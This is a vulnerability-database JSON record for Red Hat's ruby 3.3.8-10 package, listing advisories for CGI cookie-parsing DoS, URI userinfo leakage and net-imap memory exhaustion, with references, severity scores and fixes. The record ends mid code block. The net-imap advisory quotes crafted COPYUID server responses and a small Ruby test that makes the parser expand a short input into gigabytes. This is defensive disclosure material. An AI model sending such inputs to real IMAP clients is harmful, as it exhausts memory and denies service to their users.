{"url":"http://public2.vulnerablecode.io/api/packages/91148?format=json","purl":"pkg:rpm/redhat/ruby@3.3.8-10?arch=el10_0","type":"rpm","namespace":"redhat","name":"ruby","version":"3.3.8-10","qualifiers":{"arch":"el10_0"},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":null,"latest_non_vulnerable_version":null,"affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/29268?format=json","vulnerability_id":"VCID-exq5-cnrm-3uhd","summary":"CGI has Denial of Service (DoS) potential in Cookie.parse\nThere is a possibility for DoS by in the cgi gem.\nThis vulnerability has been assigned the CVE identifier CVE-2025-27219. We recommend upgrading the cgi gem.\n\n## Details\n\nCGI::Cookie.parse took super-linear time to parse a cookie string in some cases. Feeding a maliciously crafted cookie string into the method could lead to a Denial of Service.\n\nPlease update CGI gem to version 0.3.5.1, 0.3.7, 0.4.2 or later.\n\n## Affected versions\n\ncgi gem versions <= 0.3.5, 0.3.6, 0.4.0 and 0.4.1.\n\n## Credits\n\nThanks to lio346 for discovering this issue.\nAlso thanks to mame for fixing this vulnerability.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-27219.json","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-27219.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-27219","reference_id":"","reference_type":"","scores":[{"value":"0.00316","scoring_system":"epss","scoring_elements":"0.5464","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00316","scoring_system":"epss","scoring_elements":"0.54678","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00316","scoring_system":"epss","scoring_elements":"0.54679","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00316","scoring_system":"epss","scoring_elements":"0.54661","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00349","scoring_system":"epss","scoring_elements":"0.57366","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00349","scoring_system":"epss","scoring_elements":"0.57444","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00349","scoring_system":"epss","scoring_elements":"0.57409","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00349","scoring_system":"epss","scoring_elements":"0.57364","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00349","scoring_system":"epss","scoring_elements":"0.57386","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00387","scoring_system":"epss","scoring_elements":"0.59837","published_at":"2026-05-07T12:55:00Z"},{"value":"0.00387","scoring_system":"epss","scoring_elements":"0.59789","published_at":"2026-05-05T12:55:00Z"},{"value":"0.00387","scoring_system":"epss","scoring_elements":"0.59853","published_at":"2026-05-11T12:55:00Z"},{"value":"0.00387","scoring_system":"epss","scoring_elements":"0.5988","published_at":"2026-05-12T12:55:00Z"},{"value":"0.00387","scoring_system":"epss","scoring_elements":"0.59945","published_at":"2026-05-14T12:55:00Z"},{"value":"0.00387","scoring_system":"epss","scoring_elements":"0.59896","published_at":"2026-05-09T12:55:00Z"},{"value":"0.00416","scoring_system":"epss","scoring_elements":"0.6169","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00416","scoring_system":"epss","scoring_elements":"0.61675","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00623","scoring_system":"epss","scoring_elements":"0.70084","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00778","scoring_system":"epss","scoring_elements":"0.73608","published_at":"2026-04-02T12:55:00Z"},{"value":"0.00778","scoring_system":"epss","scoring_elements":"0.73631","published_at":"2026-04-04T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-27219"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27219","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27219"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://github.com/ruby/cgi","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/ruby/cgi"},{"reference_url":"https://github.com/ruby/cgi/pull/52","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/ruby/cgi/pull/52"},{"reference_url":"https://github.com/ruby/cgi/pull/53","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/ruby/cgi/pull/53"},{"reference_url":"https://github.com/ruby/cgi/pull/54","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/ruby/cgi/pull/54"},{"reference_url":"https://github.com/rubysec/ruby-advisory-db/blob/master/gems/cgi/CVE-2025-27219.yml","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-04T16:41:05Z/"}],"url":"https://github.com/rubysec/ruby-advisory-db/blob/master/gems/cgi/CVE-2025-27219.yml"},{"reference_url":"https://hackerone.com/reports/2936778","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-04T16:41:05Z/"}],"url":"https://hackerone.com/reports/2936778"},{"reference_url":"https://lists.debian.org/debian-lts-announce/2025/03/msg00008.html","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.debian.org/debian-lts-announce/2025/03/msg00008.html"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-27219","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-27219"},{"reference_url":"https://www.cve.org/CVERecord?id=CVE-2025-27219","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv3","scoring_elements":""},{"value":"5.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.cve.org/CVERecord?id=CVE-2025-27219"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1103792","reference_id":"1103792","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1103792"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2349699","reference_id":"2349699","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2349699"},{"reference_url":"https://github.com/advisories/GHSA-gh9q-2xrm-x6qv","reference_id":"GHSA-gh9q-2xrm-x6qv","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-gh9q-2xrm-x6qv"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:10217","reference_id":"RHSA-2025:10217","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:10217"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:4063","reference_id":"RHSA-2025:4063","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:4063"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:4487","reference_id":"RHSA-2025:4487","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:4487"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:4488","reference_id":"RHSA-2025:4488","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:4488"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:4493","reference_id":"RHSA-2025:4493","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:4493"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:8131","reference_id":"RHSA-2025:8131","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:8131"},{"reference_url":"https://usn.ubuntu.com/7418-1/","reference_id":"USN-7418-1","reference_type":"","scores":[],"url":"https://usn.ubuntu.com/7418-1/"},{"reference_url":"https://usn.ubuntu.com/7442-1/","reference_id":"USN-7442-1","reference_type":"","scores":[],"url":"https://usn.ubuntu.com/7442-1/"}],"fixed_packages":[],"aliases":["CVE-2025-27219","GHSA-gh9q-2xrm-x6qv"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-exq5-cnrm-3uhd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/29314?format=json","vulnerability_id":"VCID-n1ja-n53g-fycm","summary":"URI allows for userinfo Leakage in URI#join, URI#merge, and URI#+\nThere is a possibility for userinfo leakage by in the uri gem.\nThis vulnerability has been assigned the CVE identifier CVE-2025-27221. We recommend upgrading the uri gem.\n\n## Details\n\nThe methods `URI#join`, `URI#merge`, and `URI#+` retained userinfo, such as `user:password`, even after the host is replaced. When generating a URL to a malicious host from a URL containing secret userinfo using these methods, and having someone access that URL, an unintended userinfo leak could occur.\n\nPlease update URI gem to version 0.11.3, 0.12.4, 0.13.2, 1.0.3 or later.\n\n## Affected versions\n\nuri gem versions < 0.11.3, 0.12.0 to 0.12.3, 0.13.0, 0.13.1 and 1.0.0 to 1.0.2.\n\n## Credits\n\nThanks to Tsubasa Irisawa (lambdasawa) for discovering this issue.\nAlso thanks to nobu for additional fixes of this vulnerability.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-27221.json","reference_id":"","reference_type":"","scores":[{"value":"3.2","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-27221.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-27221","reference_id":"","reference_type":"","scores":[{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.11384","published_at":"2026-04-02T12:55:00Z"},{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.1144","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00118","scoring_system":"epss","scoring_elements":"0.30715","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00137","scoring_system":"epss","scoring_elements":"0.33558","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00137","scoring_system":"epss","scoring_elements":"0.33568","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00137","scoring_system":"epss","scoring_elements":"0.33592","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00137","scoring_system":"epss","scoring_elements":"0.33581","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00152","scoring_system":"epss","scoring_elements":"0.35907","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00166","scoring_system":"epss","scoring_elements":"0.37695","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00166","scoring_system":"epss","scoring_elements":"0.37709","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00169","scoring_system":"epss","scoring_elements":"0.37643","published_at":"2026-05-09T12:55:00Z"},{"value":"0.00169","scoring_system":"epss","scoring_elements":"0.37556","published_at":"2026-05-11T12:55:00Z"},{"value":"0.00169","scoring_system":"epss","scoring_elements":"0.37626","published_at":"2026-05-07T12:55:00Z"},{"value":"0.00169","scoring_system":"epss","scoring_elements":"0.37607","published_at":"2026-05-14T12:55:00Z"},{"value":"0.00169","scoring_system":"epss","scoring_elements":"0.3753","published_at":"2026-05-12T12:55:00Z"},{"value":"0.00173","scoring_system":"epss","scoring_elements":"0.3838","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00173","scoring_system":"epss","scoring_elements":"0.38651","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00173","scoring_system":"epss","scoring_elements":"0.38495","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00173","scoring_system":"epss","scoring_elements":"0.3847","published_at":"2026-04-26T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-27221"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27221","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27221"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://github.com/rubysec/ruby-advisory-db/blob/master/gems/uri/CVE-2025-27221.yml","reference_id":"","reference_type":"","scores":[{"value":"3.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-04T16:38:46Z/"}],"url":"https://github.com/rubysec/ruby-advisory-db/blob/master/gems/uri/CVE-2025-27221.yml"},{"reference_url":"https://github.com/ruby/uri","reference_id":"","reference_type":"","scores":[{"value":"3.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/ruby/uri"},{"reference_url":"https://github.com/ruby/uri/pull/154","reference_id":"","reference_type":"","scores":[{"value":"3.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/ruby/uri/pull/154"},{"reference_url":"https://github.com/ruby/uri/pull/155","reference_id":"","reference_type":"","scores":[{"value":"3.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/ruby/uri/pull/155"},{"reference_url":"https://github.com/ruby/uri/pull/156","reference_id":"","reference_type":"","scores":[{"value":"3.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/ruby/uri/pull/156"},{"reference_url":"https://github.com/ruby/uri/pull/157","reference_id":"","reference_type":"","scores":[{"value":"3.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/ruby/uri/pull/157"},{"reference_url":"https://hackerone.com/reports/2957667","reference_id":"","reference_type":"","scores":[{"value":"3.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-04T16:38:46Z/"}],"url":"https://hackerone.com/reports/2957667"},{"reference_url":"https://lists.debian.org/debian-lts-announce/2025/03/msg00008.html","reference_id":"","reference_type":"","scores":[{"value":"3.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.debian.org/debian-lts-announce/2025/03/msg00008.html"},{"reference_url":"https://lists.debian.org/debian-lts-announce/2025/05/msg00015.html","reference_id":"","reference_type":"","scores":[{"value":"3.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.debian.org/debian-lts-announce/2025/05/msg00015.html"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-27221","reference_id":"","reference_type":"","scores":[{"value":"3.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-27221"},{"reference_url":"https://www.cve.org/CVERecord?id=CVE-2025-27221","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3","scoring_elements":""},{"value":"3.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.cve.org/CVERecord?id=CVE-2025-27221"},{"reference_url":"https://www.ruby-lang.org/en/news/2025/02/26/security-advisories","reference_id":"","reference_type":"","scores":[{"value":"3.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.ruby-lang.org/en/news/2025/02/26/security-advisories"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1103794","reference_id":"1103794","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1103794"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2349700","reference_id":"2349700","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2349700"},{"reference_url":"https://github.com/advisories/GHSA-22h5-pq3x-2gf2","reference_id":"GHSA-22h5-pq3x-2gf2","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-22h5-pq3x-2gf2"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:10217","reference_id":"RHSA-2025:10217","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:10217"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:4063","reference_id":"RHSA-2025:4063","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:4063"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:4488","reference_id":"RHSA-2025:4488","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:4488"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:4493","reference_id":"RHSA-2025:4493","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:4493"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:8131","reference_id":"RHSA-2025:8131","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:8131"},{"reference_url":"https://usn.ubuntu.com/7418-1/","reference_id":"USN-7418-1","reference_type":"","scores":[],"url":"https://usn.ubuntu.com/7418-1/"},{"reference_url":"https://usn.ubuntu.com/7442-1/","reference_id":"USN-7442-1","reference_type":"","scores":[],"url":"https://usn.ubuntu.com/7442-1/"}],"fixed_packages":[],"aliases":["CVE-2025-27221","GHSA-22h5-pq3x-2gf2"],"risk_score":1.6,"exploitability":"0.5","weighted_severity":"3.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-n1ja-n53g-fycm"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/26875?format=json","vulnerability_id":"VCID-wyjh-cuuy-zbeb","summary":"Possible DoS by memory exhaustion in net-imap\n### Summary\nThere is a possibility for denial of service by memory exhaustion in `net-imap`'s response parser.  At any time while the client is connected, a malicious server can send  can send highly compressed `uid-set` data which is automatically read by the client's receiver thread.  The response parser uses `Range#to_a` to convert the `uid-set` data into arrays of integers, with no limitation on the expanded size of the ranges.\n\n### Details\nIMAP's `uid-set` and `sequence-set` formats can compress ranges of numbers, for example: `\"1,2,3,4,5\"` and `\"1:5\"` both represent the same set.  When `Net::IMAP::ResponseParser` receives `APPENDUID` or `COPYUID` response codes, it expands each `uid-set` into an array of integers.  On a 64 bit system, these arrays will expand to 8 bytes for each number in the set.  A malicious IMAP server may send specially crafted `APPENDUID` or `COPYUID` responses with very large `uid-set` ranges.\n\nThe `Net::IMAP` client parses each server response in a separate thread, as soon as each responses is received from the server.  This attack works even when the client does not handle the `APPENDUID` or `COPYUID` responses.\n\nMalicious inputs:\n\n```ruby\n# 40 bytes expands to ~1.6GB:\n\"* OK [COPYUID 1 1:99999999 1:99999999]\\r\\n\"\n\n# Worst *valid* input scenario (using uint32 max),\n# 44 bytes expands to 64GiB:\n\"* OK [COPYUID 1 1:4294967295 1:4294967295]\\r\\n\"\n\n# Numbers must be non-zero uint32, but this isn't validated.  Arrays larger than\n# UINT32_MAX can be created.  For example, the following would theoretically\n# expand to almost 800 exabytes:\n\"* OK [COPYUID 1 1:99999999999999999999 1:99999999999999999999]\\r\\n\"\n```\n\nSimple way to test this:\n```ruby\nrequire \"net/imap\"\n\ndef test(size)\n  input = \"A004 OK [COPYUID 1 1:#{size} 1:#{size}] too large?\\r\\n\"\n  parser = Net::IMAP::ResponseParser.new\n  parser.parse input\nend\n\ntest(99_999_999)\n```\n\n### Fixes\n\n#### Preferred Fix, minor API changes\nUpgrade to v0.4.19, v0.5.6, or higher, and configure:\n```ruby\n# globally\nNet::IMAP.config.parser_use_deprecated_uidplus_data = false\n# per-client\nimap = Net::IMAP.new(hostname, ssl: true,\n                               parser_use_deprecated_uidplus_data: false)\nimap.config.parser_use_deprecated_uidplus_data = false\n```\n\nThis replaces `UIDPlusData` with `AppendUIDData` and `CopyUIDData`.  These classes store their UIDs as `Net::IMAP::SequenceSet` objects (_not_ expanded into arrays of integers).  Code that does not handle `APPENDUID` or `COPYUID` responses will not notice any difference.  Code that does handle these responses _may_ need to be updated.  See the documentation for [UIDPlusData](https://ruby.github.io/net-imap/Net/IMAP/UIDPlusData.html), [AppendUIDData](https://ruby.github.io/net-imap/Net/IMAP/AppendUIDData.html) and [CopyUIDData](https://ruby.github.io/net-imap/Net/IMAP/CopyUIDData.html).\n\nFor v0.3.8, this option is not available.\nFor v0.4.19, the default value is `true`.\nFor v0.5.6, the default value is `:up_to_max_size`.\nFor v0.6.0, the only allowed value will be `false`  _(`UIDPlusData` will be removed from v0.6)_.\n\n#### Mitigation, backward compatible API\nUpgrade to v0.3.8, v0.4.19, v0.5.6, or higher.\n\nFor backward compatibility, `uid-set` can still be expanded into an array, but a maximum limit will be applied.\n\nAssign `config.parser_max_deprecated_uidplus_data_size` to set the maximum `UIDPlusData` UID set size.\nWhen `config.parser_use_deprecated_uidplus_data == true`, larger sets will raise `Net::IMAP::ResponseParseError`.\nWhen  `config.parser_use_deprecated_uidplus_data == :up_to_max_size`, larger sets will use `AppendUIDData` or `CopyUIDData`.\n\nFor v0.3,8, this limit is _hard-coded_ to 10,000, and larger sets will always raise `Net::IMAP::ResponseParseError`.\nFor v0.4.19, the limit defaults to 1000.\nFor v0.5.6, the limit defaults to 100.\nFor v0.6.0, the limit will be ignored  _(`UIDPlusData` will be removed from v0.6)_.\n\n#### Please Note: unhandled responses\nIf the client does not add response handlers to prune unhandled responses, a malicious server can still eventually exhaust all client memory, by repeatedly sending malicious responses.  However, `net-imap` has always retained unhandled responses, and it has always been necessary for long-lived connections to prune these responses.  _This is not significantly different from connecting to a trusted server with a long-lived connection._  To limit the maximum number of retained responses, a simple handler might look something like the following:\n\n  ```ruby\n  limit = 1000\n  imap.add_response_handler do |resp|\n    next unless 